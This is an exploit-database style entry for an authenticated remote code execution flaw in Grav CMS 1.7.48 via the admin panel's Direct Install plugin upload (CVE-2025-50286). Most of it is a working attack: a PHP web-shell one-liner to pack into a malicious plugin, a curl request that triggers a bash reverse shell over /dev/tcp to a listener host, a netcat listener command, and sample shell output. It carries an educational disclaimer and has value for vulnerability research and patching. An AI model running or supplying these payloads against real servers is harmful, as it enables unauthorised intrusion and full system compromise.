Grav CMS 1.7.48 – Remote Code Execution (RCE)

# Exploit Title: Grav CMS 1.7.48 - Remote Code Execution (RCE)
# Date: 2025-08-07
# Exploit Author: binneko (https://github.com/binneko)
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav/releases/tag/1.7.48
# Version: Grav CMS v1.7.48 / Admin Plugin v1.10.48
# Tested on: Debian 11, Apache2, PHP 7.4
# CVE: CVE-2025-50286

# Description:
Grav CMS v1.7.48 with Admin Plugin v1.10.48 is vulnerable to Authenticated Remote Code Execution (RCE)
through the "Direct Install" feature in the admin panel. An authenticated administrator can upload
a malicious plugin that contains arbitrary PHP code, which will be executed by the server upon access.

# Steps to Reproduce:

1. Start a listener on your attack machine:
   nc -lvnp 4444

2. Log in to the Grav Admin Panel as an administrator:
   https://<target>/admin

3. Navigate to:
   Tools → Direct Install

4. Upload a ZIP archive containing the following structure:

   evilplugin/
   ├── evilplugin.php        # Contains: <?php shell_exec($_GET['cmd']); ?>
   └── blueprints.yaml       # Minimal content to pass plugin validation

5. Access the uploaded plugin’s endpoint and trigger the payload:

   curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/

6. Observe the reverse shell:

   $ nc -lvnp 4444
   Listening on 0.0.0.0 4444
   Connection received on <target-ip>
   www-data@target:/var/www/html$ whoami
   www-data

# Notes:
- Authentication is required (admin-level).
- The vulnerability exists due to insufficient validation in the plugin upload feature (`/admin/tools/direct-install`).
- Successful exploitation may result in full system compromise.

# References:
- https://github.com/getgrav/grav
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50286

# Disclaimer:
This exploit is provided for educational and research purposes only.